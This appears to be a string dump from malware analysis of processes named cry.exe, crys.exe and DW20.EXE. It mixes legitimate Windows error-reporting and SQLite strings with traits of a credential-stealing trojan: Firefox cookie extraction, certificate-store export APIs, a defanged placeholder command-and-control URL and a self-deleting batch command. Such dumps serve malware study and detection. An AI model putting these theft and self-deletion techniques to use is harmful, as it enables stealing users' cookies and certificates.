?msodatad.dat
msodatalast.dat
Unicows.dll
Kernel32.dll
SHLWAPI.DLL
GDI32.DLL
wintrust.dll
1108160
ADVAPI32.dll
COMCTL32.dll
GDI32.dll
KERNEL32.dll
OLEACC.dll
OLEAUT32.dll
MSVCRT.dll
RPCRT4.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
USER32.dll
VERSION.dll
WININET.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ReportEventA
ReportEventW
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyW
GetProcessHeap
GetSystemWindowsDirectoryW
_amsg_exit
_acmdln
ShellExecuteExA
UrlGetPartA
CreateURLMoniker
CreateDialogIndirectParamA
EnumWindows
HttpQueryInfoA
HttpSendRequestExA
HttpOpenRequestA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpEndRequestA
dw20.pdb
\devsplab1\otools\BBT_TEMP\DW20O.pdb
winword.exe
wwordlt.exe
excel.exe
excellt.exe
mspub.exe
frontpg.exe
outlook.exe
powerpnt.exe
powpntlt.exe
onenote.exe
infopath.exe
winproj.exe
ois.exe
visio.exe
crys.exe
name="Microsoft.Windows.ErrorReporter"
version="5.1.0.0"
publicKeyToken="6595b64144ccf1df" />
<description>Windows Error Reporting</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
1%s\%s\%s\%s\%s\%s\%s\%s
AppName: %s AppVer: %s AppStamp:%s
ModName: %s ModVer: %s ModStamp:%s
fDebug: %s Offset: %s
Main_AlwaysReportBtn=
Main_NoReportBtn=
Main_ReportBtn=
General_Reportee=
CheckBoxRegKey=
ReportingFlags=
Stage1URL=
Stage2URL=
%General_Reportee%
%u %s
%u.%u %s
%s %s %s %s in %s %s %s fDebug %s at offset %s
Bucket: d
BucketTable %d
%s, %s, %s, %s, %s, %s, %s, %s, %s, %s %s
\dw.log
policy.txt
crash.log
status.txt
hits.log
count.txt
%s\%s\%s
%s\%s\%s\%s
eDWQueuedReporting
DWPersistentQueuedReporting
"%s\%s" -%c
dwtrig20.exe
ReportSize=
\*.cab
dwq.snt
"%s" -%c %u
SEventSystem.EventSubscription
SubscriptionID=%s
#$%&%&'(
Comctl32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\14B8B0.dmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
.NET Runtime 2.0 Error Reporting
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dw.log
Microsoft Application Error Reporting
11.0.8160
Windows
DW20.Exe

cry.exe_372_rwx_03EE0000_0003B000:

.text
`.data
.reloc
%s, u %s %u u:u:u GMT
HTTP/1.1
HTTP/1.0
hXXp://
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
update.exe
config.bin
PR_OpenTCPSocket
cit_ffcookie.module
cit_video.module
%ds~U;MM
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
hXXps://
HTTP/1.
facebook.com
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
_getFirefoxCookie
hXXp://VVV.google.com/webhp
SSShD
SSShXe
SSShye
GetProcessHeap
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjects
OpenWindowStationW
GetProcessWindowStation
CreateWindowStationW
CloseWindowStation
SetProcessWindowStation
SetKeyboardState
ExitWindowsEx
GetKeyboardState
MapVirtualKeyW
GetKeyboardLayoutList
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
SetViewportOrgEx
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
InternetCrackUrlA
HttpAddRequestHeadersW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
WINMM.dll
nspr4.dll
chrome.dll
\StringFileInfo\xx\%s
ntdll.dll
kernel32.dll
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
Global\XXX
SysShadow
Chrome
Firefox
%Documents and Settings%\%current user%\Application Data
{E90C4A0B-BD46-7BBE-341D-3959D67D1D48}
%Documents and Settings%\%current user%\Application Data\Tyawy\foed.qid
%Documents and Settings%\%current user%\Application Data\Tyawy
foed.qid
Global\{7F77F82E-0F63-EDC5-341D-3959D67D1D48}

cry.exe_372_rwx_041E0000_0006C000:

<1%u3
GetProcessWindowStation
3.7.13
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
-cmd command run "command" before reading stdin
-echo print commands before execution
-version show SQLite version
%a, %d-%b-%Y %H:%M:%S GMT
isHttpOnly
HttpOnly=YES
HttpOnly=NO
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s TABLE %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid>? AND rowid<?)
%s (rowid>?)
%s (rowid<?)
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
at most %d tables in a join
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
no such %s mode: %s
%s mode not allowed: %s
no such vfs: %s
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
(%d) %s
%*s = %s
%-*.*s%s
INSERT INTO %s VALUES(
%sNULL
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache misses: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Sort Operations: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;

cry.exe_372_rwx_675A6000_00003000:

.Qg<-Qg
*Rg`.Rg|)RgL Rg

crys.exe_1460_rwx_012B0000_0003B000:


crys.exe_1460_rwx_037E0000_0006C000:


crys.exe_1460_rwx_675A6000_00003000:

.Qg<-Qg
*Rg`.Rg|)RgL Rg

DW20.EXE_1296_rwx_00AB0000_0003B000:


DW20.EXE_1296_rwx_015A0000_0006C000:

misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
(%d) %s
%*s = %s
%-*.*s%s
INSERT INTO %s VALUES(
%sNULL
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache misses: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Sort Operations: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.schema ?TABLE? Show the CREATE statements
.separator STRING Change separator used by output mode and .import
.show Show the current values for various settings
.stats ON|OFF Turn stats on or off
.tables ?TABLE? List names of tables
.timeout MS Try opening locked tables for MS milliseconds
.trace FILE|off Output each SQL statement as it is run
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set column widths for "column" mode
.timer ON|OFF Turn the CPU timer measurement on or off
Error: unable to open database "%s": %s
Error: cannot open "%s"
Error: %s
PRAGMA foreign_keys=OFF;
SELECT name, type, sql FROM sqlite_master WHERE sql NOT NULL AND type=='table' AND name!='sqlite_sequence'
SELECT name, type, sql FROM sqlite_master WHERE name=='sqlite_sequence'
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view')
SELECT name, type, sql FROM sqlite_master WHERE tbl_name LIKE shellstatic() AND type=='table' AND sql NOT NULL
SELECT sql FROM sqlite_master WHERE sql NOT NULL AND type IN ('index','trigger','view') AND tbl_name LIKE shellstatic()
import
Error: non-null separator required for import
SELECT * FROM %s
INSERT INTO %s VALUES(?
Error: %s line %d: expected %d columns of data but found %d
SELECT name FROM sqlite_master WHERE type='index' AND name NOT LIKE 'sqlite_%' UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' ORDER BY 1
SELECT name FROM sqlite_master WHERE type='index' AND tbl_name LIKE shellstatic() UNION ALL SELECT name FROM sqlite_temp_master WHERE type='index' AND tbl_name LIKE shellstatic() ORDER BY 1
Error: querying sqlite_master and sqlite_temp_master
Error: invalid arguments: "%s". Enter ".help" for help
Error: cannot open pipe "%s"
Error: cannot write to "%s"
CREATE TABLE sqlite_master (
CREATE TEMP TABLE sqlite_temp_master (
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE lower(tbl_name) LIKE shellstatic() AND type!='meta' AND sql NOTNULL ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
SELECT sql FROM (SELECT sql sql, type type, tbl_name tbl_name, name name, rowid x FROM sqlite_master UNION ALL SELECT sql, type, tbl_name, name, rowid FROM sqlite_temp_master) WHERE type!='meta' AND sql NOTNULL AND name NOT LIKE 'sqlite_%'ORDER BY substr(type,2,1), CASE type WHEN 'view' THEN rowid ELSE name END
%9.9s: %s
SELECT name FROM sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT 'temp.' || name FROM sqlite_temp_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%z UNION ALL SELECT '%q.' || name FROM "%w".sqlite_master WHERE type IN ('table','view') AND name NOT LIKE 'sqlite_%%' AND name LIKE ?1
%s%-*s
iskeyword
ambiguous option name: "%s"
Error: invalid testctrl option: %s
%d (0xx)
Error: testctrl %s takes a single int option
Error: testctrl %s takes no options
Error: testctrl %s takes a single unsigned int option
Error: CLI support for testctrl %s not implemented
SQLite %s %s
Error: unknown command or invalid arguments: "%s". Enter ".help" for help
Error: near line %d:
%s %s
Error: incomplete SQL: %s
%s: Error: cannot locate your home directory
%s/.sqliterc
-- Loading resources from %s
Usage: %s [OPTIONS] FILENAME [SQL]
FILENAME is the name of an SQLite database. A new database is created
sqlite>
SQLite header and source version mismatch
no such VFS: "%s"
%s: Error: too many options: "%s"
%s: Error: missing argument for option: %s
Error: unable to process SQL "%s"
%s: Error: unknown option: %s
%s/.sqlite_history
SQLite version %s %.19s
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE
GetCPInfo
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ole32.dll
ffcookieextractor.dll
_getFirefoxCookie
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
%AppData%\Mozilla\Firefox
\profiles.ini
\cookies.sqlite
Kernel32.dll

DW20.EXE_2176:

.text
`.data
.cdata
.rsrc
watson.microsoft.com
.mdmp
%s?szAppName=%S&szAppVer=%S&szAppStamp=%S&szModName=%S&szModVer=%S&szModStamp=%S&fDebug=%S&offset=%S
/dw/stagetwo.asp
%s/%S/%S/%S/%S/%S/%S/%S/%S.htm
Failed to fill report params from generic params
Not offering reporting
%s Mode
Failed to get a reporting destination
Nothing to report from queue
No reports left to send. Removing queue triggers and bailing.
Failed to plug UI; LCID=%u
Ignoring %S due to unknown queue version
Reporting is disabled
SignOff queue reporting is disabled
Queued Reporting Mode called but still want to report to the queue
Bad queue type to report from
No reports for given queue mask - %u
Invalid queue mask - %u
Suspending: Force cancel to queued reporting
Suspending: Force cancel to network reporting
CreateWindowExA failed with %d.
Application Error Reporting %d
WatsonQueuedReportingInstanceVerification
riched20.dll
qMicrosoft\PCHealth\ErrorReporting\DW
msaccess.exe
hXXp://watson.microsoft.com/dw/dcp.asp
hXXp://watson.microsoft.com/dw/watsoninfo.asp
dwintl20.dll
Launching lightweight browser with URL
mshtml.dll
Not reporting
Reporting
DWBypassQueue
DWExplainerURL
DWNoSignOffQueueReporting
DWAlwaysReport
DWReporteeName
DWURLLaunch
DWNoExternalURL
DWStressReport
ole32.dll
imm32.dll
BTLog.dll
Microsoft\PCHealth\ErrorReporting\DW
HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger
hXXp://
hXXps://
Software\Microsoft\PCHealth\ErrorReporting\DW\Debug
%s\%s
https
DwBTLog.log
Failed to get minidump for %S!
szAppName=%s
szAppVer=%d.%d.%d.%d
szAppStamp=x
szModName=%s
szModVer=%d.%d.%d.%d
szModStamp=x
fDebug=%s
offset=x
microsoft.com
.msn.com
.microsoft.com
d:d:d d-d-d
/dw/generictwo.asp
kernel32.dll
psapi.dll
mso.dll
MsoDWRecover%x
MsoDWHang%x
Launching browser with URL
shell32.dll
%d.%d.%d.%d
%d.%d.%d.%d.x.%d.%d
shfolder.dll
unknown.sig
%s dw20.exe %d.%d.%d.%d
RegKey=
ResponseURL=
URLLaunch=
NoExternalURL=
%s:(%s) XX
%s:(%s) X
%s:(%s)
%s:(%s) %s
registry.txt
wql.txt
Windows NT Version %d.%d Build: %d
Stage 1 server response: %s
Stage 2 server response: %s
Stage 4 server response: %s
StatusCode: %d
Opening server: %s
HttpOpen failed.
Opening %s Request:
HTTPS
HttpSend Failed.
HttpWrite Failed, GLE=%d.
HttpEndReq failed.
Count filename length greater than MAX_PATH, can't report.
Filesystem reporting: count file updated
FReportToQueue: GetLastError=%u
FReportToQueue: File Tree Root does not exist: %S
Failed to add heap file to cab: %S
memory.dmp
mdmpmem.hdmp
version.txt
Network reporting complete.
Network reporting failed.
Application Error Reporting Transfer %d
Filesystem reporting complete
Filesystem reporting: cab successfully written
Filesystem reporting: could not find/create directory for cab/count
Filesystem reporting: redirection failure, too many redirects
Filesystem reporting: redirection failure, no previous roots
Filesystem reporting: improper file tree root
Filesystem reporting cancelled
Filesystem reporting: file tree root is too long
Record: 0xxx
Address: 0xxx
Code: 0xx
Flags: 0xx
x:x
(%d.%d:%d.%d)
Checksum: 0xx
Time Stamp: 0xx
Image Base: 0xx
Image Size: 0xx
Module %d
Windows NT %d.%d Build: %d
CPU AMD Feature Code: X
CPU Version: X CPU Feature Code: X
CPU Vendor Code: X - X - X
0xx:
0xx: x x x x
EFlags: 0xx ESP: 0xx SegSs: 0xx
EIP: 0xx EBP: 0xx SegCs: 0xx
EBX: 0xx ECX: 0xx EDX: 0xx
EDI: 0xx ESI: 0xx EAX: 0xx
Thread ID: 0xx
Thread %d
Memory Range %d
Software\Microsoft\PCHealth\ErrorReporting\DW
OkToReportFromTheseQueues
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Failed to obtain queue mutex. GetLastError=%u
FGetQueueMutex: WaitForSingleObject returned %u
Failed to open or create queue mutex. GetLastError=%u
Failed queued reporting pester check
Failed to create run reg key
Persistent run key is set.
CoInitializeEx() returned 0x%x.
Reporting to Admin Queue
Reporting to Regular Queue
Reporting to SignOff Queue
Reporting to Headless Queue
Reporting from Regular Queue
Reporting from SignOff Queue
Reporting from Headless Queue
OOM Failed to alloc QueuedReportData
FAllocSD: GetLastError=%u
%s%s%s
FEnsureQueueDirW: GetLastError=%u
Failed to write snt. GLE: %u
Failed to create snt. GLE: %u
Failed to set info; bad queue type: %u
Failed to open reg key for queue
Failed to get windows folder path for queue: %u
Failed to move instr file from queue A to queue B - %u
Failed to move cab file from queue A to queue B - %u
Did not move any reports from admin q to user q
Did not move any reports from user q to headless q
Queue types that have reports: %u
Setting triggerAtConnectionMade to: %u
Setting triggerAtLogon to: %u
Setting the queue trigger based upon: %u
SUCCESS adding report to queue
Launched (%S)
Failed to store the SensSubscription. hr: %d
failed to allocate PROGID string: %S
Failed putting SubscriberInterface. hr: %d
Failed putting PerUser. hr: %d
Failed putting Enabled. hr: %d
Failed putting MachineName. hr: %d
Failed putting OwnerSID. hr: %d
Failed putting Description. hr: %d
Failed putting InterfaceID. hr: %d
Failed putting EventClassID. hr: %d
Failed putting MethodName. hr: %d
Failed putting SubscriptionName. hr: %d
Failed putting PublisherID. hr: %d
Failed putting SubscriberCLSID. hr: %d
Failed putting SubscriptionID. hr: %d
Failed CoCreateInstance on EventSubscription. hr: %d
Failed to remove the SensSubscription. hr: %d
failed to allocate query string: %S
Failed CoCreateInstance on EventSystem. hr: %d
SENS: StringFromIID() returned <%x>
DWSHARED: SysAllocString(%s) failed!
Failed to subscribe subscription %u. hr: %d
Failed to get data for subscription %u. hr: %d
Failed to query install reg key
Failed to open install reg key
Software\Microsoft\PCHealth\ErrorReporting\DW\Installed
HKEY_USERS\
HKEY_CURRENT_CONFIG\
HKEY_CLASSES_ROOT\
HKEY_LOCAL_MACHINE\
HKEY_CURRENT_USER\
initing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
freeing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
0addref CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
QIing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
releasing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
deleting CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
creating CDwAccessible: hwnd %x, idc %d
WriteAtOffset.Write(0x%x) failed, 0xx
WriteAtOffset.Seek(0x%x) failed, 0xx
WriteMemoryFromProcess.Read(0x%I64x, 0x%x) failed, 0xx
WriteStringToPool.Write(0x%x) failed, 0xx
WriteFunctionTable.RawEntries.Write(0x%x) failed, 0xx
WriteFunctionTable.RawTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.DumpTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.Seek(0x%x) failed, 0xx
WriteDirectoryEntry.Write(0x%x) failed, 0xx
Thread(0x%x) callback returned FALSE
WriteSystemInfo.GetOsCsdString failed, 0xx
WriteSystemInfo.GetCpuInfo failed, 0xx
CalculateSizeForSystemInfo.GetOsCsdString failed, 0xx
WriteHeader.GetCurrentTimeDate failed, 0xx
WriteDirectoryTable.Seek(0x%x) failed, 0xx
WriteMemoryInfo.Write(0x%x) failed, 0xx
WriteMemoryInfo.QueryVirtual(0x%I64x) failed, 0xx
WriteFullMemory virtual memory layout changed, retries %d, 0x%I64x (0x%I64x:0x%I64x) vs. 0x%I64x (0x%I64x:0x%I64x)
WriteFullMemory.Memory.Write(0x%x) failed, 0xx
